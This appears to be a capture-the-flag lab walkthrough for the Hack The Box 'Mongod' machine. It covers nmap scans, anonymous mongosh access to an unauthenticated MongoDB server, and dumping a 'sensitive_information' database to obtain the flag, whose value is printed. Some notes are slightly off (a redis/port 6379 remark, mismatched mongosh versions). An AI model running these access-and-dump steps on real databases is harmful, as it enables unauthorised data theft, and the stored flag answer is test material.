07.MONGOD (MONGODB)

MongoDB, Databases, Reconnaissance, Misconfiguration, Anonymous/Guest Access

root@oco:~$ sudo openvpn ~/Downloads/starting_point.ovpn

ENUMERATE SERVICES

root@htb:~$ nmap -sV -T4 {targetIP} -p-
 PORT   STATE SERVICE VERSION
 22/tcp    open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
 27017/tcp open  mongodb MongoDB 3.6.8

VULNERABILITY SCANNING

root@htb:~$ nmap -sV -sC -T4 {targetIP} -p 27017
 PORT   STATE SERVICE VERSION
 27017/tcp open  mongodb MongoDB 3.6.8 3.6.8
 | mongodb-info: 
 |   MongoDB Build info
 |     openssl
 |       running = OpenSSL 1.1.1f  31 Mar 2020
 |       compiled = OpenSSL 1.1.1f  31 Mar 2020
 |     ok = 1.0
 |     buildEnvironment
 |       target_arch = x86_64
 |       distmod = 
 |       target_os = linux
 ...

 * the -SC runs the default set of Nmap scripts (NSE scripts), which typically include
   scripts for service enumeration, version detection, and other basic checks.
   
root@htb:~$ sudo nmap --script=vuln {targetIP} -p 27017
 PORT   STATE SERVICE
 27017/tcp open  mongod

 * the --script=vuln will run scripts that focus specifically on detecting known 
   vulnerabilities in the service running on port 6379
    - e.g., weak configurations, or known vulnerabilities in the redis service
       - if no results are found then the service may be fully patched!

FOOTHOLD/COMPROMISE

Submit root flag
root@htb:~$ which mongosh
root@htb:~$ sudo apt search mongosh
 mongodb-mongosh/bullseye/mongodb-org/7.0 2.3.7 amd64 [upgradable from: 1.10.6] MongoDB Shell CLI REPL Package
root@htb:~$ sudo apt install mongodb-mongosh
 * ALT: wget https://github.com/mongodb-js/mongosh/releases/download/v2.0.0/mongosh-2.0.0-linux-x64.tgz
        tar xvf mongosh-2.3.2-linux-x64.tgz
        cd mongosh-2.3.2-linux-x64/bin
        ./mongosh mongodb://{target_IP}:27017
    - use the older version of mongosh due to client/server version incompatibility

#connecting to the MongoDB server running on the remote host as an anonymous user.
root@htb:~$ which mongosh
 /usr/bin/mongosh
 
 * mongosh is a MongoDB Shell utility used connect to the remote MongoDB server

root@htb:~$ mongosh mongodb://10.129.255.118:27017

 * this cmd will automatically connect to the remote MongoDB server using anonymous credentials (if allowed)
     
#enumeration
mongoDB> show dbs;                                         //list databases
 admin                  32.00 KiB
 config                 72.00 KiB
 local                  72.00 KiB
 sensitive_information  32.00 KiB
 users                  32.00 KiB
 
mongoDB$ use sensitive_information;                        //access a database
 switched to db sensitive_information

mongoDB\sensitive_information> show collections;           //list collections stored in the database named sensitive_information
 flag

mongoDB\sensitive_information> db.flag.find();
[
  {
    _id: ObjectId("630e3dbcb82540ebbd1748c5"),
    flag: '1b6e6fb359e7c40241b6d431427ba6ea'
  }
]

 * the db.{collectionName}.find() cmd will dump the contents of the document

 * ALT: mongoDB$ db.flag.find().pretty();                  //dump contents of the documents present in the flag collection
        [
          {
            _id: ObjectId("630e3dbcb82540ebbd1748c5"),
            flag: '1b6e6fb359e7c40241b6d431427ba6ea'
          }
        ]
Previous06.PREIGNITION (WEB FORM LOGIN)Next08.SYNCED (RSYNC)

Last updated